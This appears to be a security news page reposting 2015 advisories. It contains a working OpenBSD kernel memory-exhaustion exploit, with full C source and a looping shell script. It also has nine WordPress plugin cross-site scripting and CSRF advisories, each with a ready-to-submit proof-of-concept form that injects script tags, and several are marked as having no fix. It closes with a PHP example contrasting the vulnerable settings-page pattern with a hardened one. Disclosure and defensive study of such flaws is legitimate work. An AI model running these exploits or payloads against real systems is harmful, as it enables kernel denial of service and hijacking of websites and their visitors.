MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

31Aug/15

OpenBSD Local Denial Of Service

/*
 * 2015, Maxime Villard
 * Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged
 * user. Found by The Brainy Code Scanner.
 */
 
- - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - -
 
#! /bin/sh
while true
do
  systrace -A ./exploit
done
 
- - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - -
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
/*
 * Exec "bin", which is linked against a non-existent dynamic linker
 * (/DEAD, see the build line below), so the exec cannot complete.
 * script.sh repeats this under systrace -A until the kernel runs out
 * of memory.
 */
int main(int argc, char *argv[]) {
  execve("bin", argv, NULL);
  return 1; /* only reached when execve fails */
}
 
- - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - -
 
int main() {}
 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
  $ gcc -o exploit exploit.c
  $ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c
  $ ./script.sh
 
Wait a bit, and the kernel will run out of memory.


31Aug/15

WordPress Advertisement Management 1.0 Cross Site Scripting

Title: WordPress 'Advertisement Management' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/advertisement-management/
- https://plugins.svn.wordpress.org/advertisement-management/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Advertisement Management lets you administrate all the blog advertisements directly from the blog backend.
 
## XSS/CSRF vulnerabilities
==========================================================
The settings on the admin page are vulnerable to XSS.
 
PoC:
Log in as admin and submit this form:
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update"> 
   <input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br />
   <input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br />
   <input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br />
   <input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br />
   <input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br />
   <input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br />
   <input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br />
   <input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br />
  <input type="submit">
</form>
 
After having done this, some of the injected scripts will be executed when loading the front page of the site.
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress arcResBookingWidget 1.0 Cross Site Scripting

Title: WordPress 'arcResBookingWidget' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/arcres-booking-engine/
- https://plugins.svn.wordpress.org/arcres-booking-engine/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Embeds the arcRes Booking Widget on a travel supplier website and ensures it is displayed for all arcRes-driven referrals.
 
## XSS/CSRF vulnerability
==========================================================
The iconmap admin setting is vulnerable to stored XSS and can be set using CSRF.
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=arcRes-BookingWidget-options"> 
   <input type="text" name="formAction" value="Y"><br />
   <input type="text" name="arcRes_BookingWidget_option_iconmap" value='100000"><script>alert(1)</script>'><br />
   <input type="text" name="arcRes_BookingWidget_option_layout" value="vertical"><br />
   <input type="text" name="arcRes_BookingWidget_option_arcResReferralOnly" value="0"><br />
   <input type="text" name="arcRes_BookingWidget_option_cookieType" value="permanent"><br />
   <input type="text" name="Submit" value="Save Options"><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerability found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress Content Grabber 1.0 Cross Site Scripting

Title: WordPress 'Content Grabber' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-14
Download: 
- https://wordpress.org/plugins/content-grabber/
- https://plugins.svn.wordpress.org/content-grabber/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
A plugin to help you grab content of any post type and display it as you want.
 
## Vulnerabilities
==========================================================
Two POST parameters (obj_field_name and obj_field_id) are printed unsanitized when the 'get_terms_taxonomies' action is executed. 
 
PoC: 
 
Log in as admin and submit the following request:
 
<form method="POST" action="[URL]/wp-admin/admin-ajax.php"> 
  <input type="text" name="action" value="get_terms_taxonomies"><br />
  <input type="text" name="post_type" value="post"><br />
  <input type="text" name="obj_field_name" value="widget-cg_content_grabber[3][cat_id]"><script>alert(1)</script>"><br />
  <input type="text" name="obj_field_id" value="widget-cg_content_grabber-3-cat_id"><script>alert(2)</script>"><br />
  <input type="text" name="cat_id_array" value='["1"]'><br />
  <input type="submit">
</form>
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress Default Facebook Thumbnails 0.4 Cross Site Scripting

Title: WordPress 'Default Facebook Thumbnails' Plugin 
Version: 0.4
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-13
Download: 
- https://wordpress.org/plugins/default-facebook-thumbnail/
- https://plugins.svn.wordpress.org/default-facebook-thumbnail/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
This plugin adds an og:image tag to your head with the input/upload of the image in the settings.
 
## XSS/CSRF Vulnerabilities
==========================================================
The request URI is echoed into the HTML page without sanitization. This can be exploited with a direct link to the vulnerable file (keep in mind that most modern browsers encode the URL).
 
PoC:
[URL]/wp-content/plugins/default-facebook-thumbnail/fb_thumbnail_admin.php?/"><script>alert(1)</script>
 
The "Upload Image or URL" field in the admin-settings page is vulnerable to stored XSS. This can be exploited by utilizing a CSRF vulnerability.
 
PoC:
Log in as admin and submit this form:
 
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=fb_thumbs"> 
  <text>upload image: </text>
   <input type="text" name="upload_image" value=""><script>alert(1)</script>"><br />
   <text>fb_thumb_hidden: </text>
  <input type="text" name="fb_thumb_hidden" value="Y" readonly><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress Chief Editor 3.6.1 Cross Site Scripting

Title: WordPress 'Chief Editor' Plugin 
Version: 3.6.1
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-17
Download: 
- https://wordpress.org/plugins/chief-editor/
- https://plugins.svn.wordpress.org/chief-editor/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Helps wordpress multisite "chief editor" to manage all drafts, comments, authors and "ready for publication" sends across the netw
 
## Vulnerabilities
==========================================================
Some POST parameters are printed directly to the HTML without being sanitized. 
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp422/wp-admin/admin.php?page=chief-editor-dashboard"> 
  <input type="text" name="submitDate" value="someValue"><br />
  <input type="text" name="datepicker" value=""/><script>alert(1)</script>"><br />
  <input type="text" name="blog_id" value=""/><script>alert(2)</script>"><br />
  <input type="text" name="post_id" value=""/><script>alert(3)</script>"><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting

Title: WordPress '1-click Retweet/Share/Like' Plugin 
Version: 5.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/1-click-retweetsharelike/
- https://plugins.svn.wordpress.org/1-click-retweetsharelike/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ
 
## Vulnerabilities
==========================================================
The plugin is vulnerable to reflected XSS.
 
PoC:
Submit the following request (no need to log in first):
<form method="POST" action="[URL]/wp-login.php"> 
   <input type="text" name="lacandsnw_networkpub_key" value=""><script>alert(1)</script>"><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress Author Manager 1.0 Cross Site Scripting

Title: WordPress 'Author Manager' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/author-manager/
- https://plugins.svn.wordpress.org/author-manager/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Author Manager is a must-have for administrators of a multiple-author WordPress site. Easily view post statistics by date.
 
## Vulnerabilities
==========================================================
Some of the fields in the admin panel are vulnerable to XSS.
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp-admin/users.php?page=author-manager%2Fauthor_manager.php"> 
   <input type="text" name="am-filter-type" value="am-date-filter" readonly><br />
   <input type="text" name="am-start-date" value="'><script>alert(1)</script>"><br />
   <input type="text" name="am-end-date" value="'><script>alert(2)</script>"><br />
  <input type="submit">
</form>
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress Ads In Bottom Right 1.0 Cross Site Scripting

Title: WordPress 'Ads in bottom right' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/ads-in-bottom-right/
- https://plugins.svn.wordpress.org/ads-in-bottom-right/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
This plugin allows you to show advertising in the bottom right; you can put images, Flash or any HTML code you want.
 
## Vulnerabilities
==========================================================
The plugin settings are vulnerable to XSS attacks.
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=ads-in-bottom-right.php"> 
   <input type="text" name="status_submit" value="2"><br />
   <input type="text" name="ads_title" value='"><script>alert(1)</script>'><br />
  <input type="text" name="html_code" value="</textarea><script>alert(2)</script>"><br />
  <input type="text" name="submit" value="Save setting"><br />
 
  <input type="submit">
</form>
 
After doing this, the injected script will also be executed when loading the main page.
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.


31Aug/15

WordPress Google Plus One Button By KMS 1.5.0 CSRF / XSS

Title: WordPress 'Google 'Plus one' Button by kms' Plugin 
Version: 1.5.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/google-plus-one-button-by-kms/
- https://plugins.svn.wordpress.org/google-plus-one-button-by-kms/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
WordPress plugin for placing the Google +1 (plus one) button. It can be displayed before or after a post, or on the left side next to the posts.
 
## CSRF/XSS vulnerabilities
==========================================================
The $_SERVER variable 'REQUEST_URI' is printed directly into the HTML on the admin page. 
 
The settings in the admin panel are vulnerable to stored XSS, and the settings can be changed using a CSRF attack.
 
PoC(s):
Log in as admin and submit one of the following forms:
 
XSS on admin pages:
<form method="POST" action="[URL]/wp-admin/options-general.php?page=google-plus-one-share-button"> 
   <input type="text" name="button_size" value="</script><script>alert(1)</script>"><br />
  <input type="text" name="button_location" value="</script><script>alert(2)</script>"><br />
   <input type="text" name="top_space" value="</script><script>alert(3)</script>"><br />
   <input type="text" name="left_space" value="</script><script>alert(4)</script>"><br />
   <input type="text" name="position" value="</script><script>alert(5)</script>"><br />
   <input type="text" name="filter_tag" value="</script><script>alert(6)</script>"><br />
   <input type="text" name="rp_gpo_submit" value="true" readonly><br />
  <input type="submit">
</form>
 
 
XSS on pages displaying a Google Plus +1 button:
<form method="POST" action="[URL]/wp-admin/options-general.php?page=google-plus-one-share-button"> 
   <input type="text" name="button_size" value=""><br />
  <input type="text" name="button_location" value="left" readonly><br />
   <input type="text" name="top_space" value="asdf;}</style><script>alert(3)</script>"><br />
   <input type="text" name="left_space" value="asdf;}</style><script>alert(4)</script>"><br />
   <input type="text" name="position" value="asdf;}</style><script>alert(5)</script>"><br />
   <input type="text" name="filter_tag" value=""><br />
   <input type="text" name="rp_gpo_submit" value="true" readonly><br />
  <input type="submit">
</form>
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=google-plus-one-share-button"> 
   <input type="text" name="button_size" value=""/><script>alert(1)</script>"><br />
  <input type="text" name="button_location" value="top" readonly><br />
   <input type="text" name="rp_gpo_submit" value="true" readonly><br />
  <input type="submit">
</form>
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
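The WordPress advisories above all report the same settings-page pattern: a POST handler with no nonce or capability check, values stored unsanitized, and those values (or REQUEST_URI) echoed raw into attributes, textareas, script and style blocks. The following is an added example of that pattern beside a hardened version, not code from any of the plugins above; the option name ex_ads_options, the page slug ex-ads and the field names ads_title, html_code and top_space are assumptions.

```php
<?php
// Added example (not from any plugin above). Hypothetical names: option
// ex_ads_options, page slug ex-ads, fields ads_title / html_code / top_space.

// Vulnerable shape reported by the advisories: no nonce or capability check,
// raw $_POST stored, raw option values and REQUEST_URI echoed into markup.
function ex_ads_page_vulnerable() {
    if ( isset( $_POST['ads_title'] ) ) {                      // any cross-site POST is accepted (CSRF)
        update_option( 'ex_ads_options', $_POST );             // stored without sanitization
    }
    $o = get_option( 'ex_ads_options' );
    echo '<form method="post" action="' . $_SERVER['REQUEST_URI'] . '">';  // reflected XSS
    echo '<input name="ads_title" value="' . $o['ads_title'] . '">';       // "> breaks out of the attribute
    echo '<textarea name="html_code">' . $o['html_code'] . '</textarea>';  // </textarea> breaks out
    echo '<style>#ex-ads{top:' . $o['top_space'] . 'px}</style></form>';   // }</style> breaks out
}

// Hardened version: capability check, nonce, sanitize on save, escape per
// output context on render, and a fixed form action instead of REQUEST_URI.
function ex_ads_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    if ( isset( $_POST['ex_ads_submit'] ) ) {
        check_admin_referer( 'ex_ads_save', 'ex_ads_nonce' );   // dies on a missing or forged nonce
        update_option( 'ex_ads_options', array(
            'ads_title' => sanitize_text_field( wp_unslash( $_POST['ads_title'] ?? '' ) ),
            'html_code' => wp_kses_post( wp_unslash( $_POST['html_code'] ?? '' ) ), // HTML kept, script stripped
            'top_space' => absint( $_POST['top_space'] ?? 0 ),                      // numeric only
        ) );
    }
    $o = wp_parse_args( get_option( 'ex_ads_options', array() ),
        array( 'ads_title' => '', 'html_code' => '', 'top_space' => 0 ) );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=ex-ads' ) ); ?>">
        <?php wp_nonce_field( 'ex_ads_save', 'ex_ads_nonce' ); ?>
        <input type="text" name="ads_title" value="<?php echo esc_attr( $o['ads_title'] ); ?>">
        <textarea name="html_code"><?php echo esc_textarea( $o['html_code'] ); ?></textarea>
        <input type="number" name="top_space" value="<?php echo (int) $o['top_space']; ?>">
        <input type="submit" name="ex_ads_submit" value="Save">
    </form>
    <style>#ex-ads { top: <?php echo (int) $o['top_space']; ?>px; }</style>
    <?php
}

// Front-end output of the same options: escape for the HTML body context and
// re-filter the stored HTML, so a tampered database row still cannot inject script.
function ex_ads_render_front() {
    $o = get_option( 'ex_ads_options', array() );
    echo '<div id="ex-ads"><h4>' . esc_html( $o['ads_title'] ?? '' ) . '</h4>';
    echo wp_kses_post( $o['html_code'] ?? '' ) . '</div>';
}
```

Each escaping call matches the context it is used in (esc_attr for attribute values, esc_textarea for textarea bodies, an integer cast inside the style block), which is what neutralizes the `">`, `</textarea>` and `}</style>` breakouts shown in the PoC forms.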
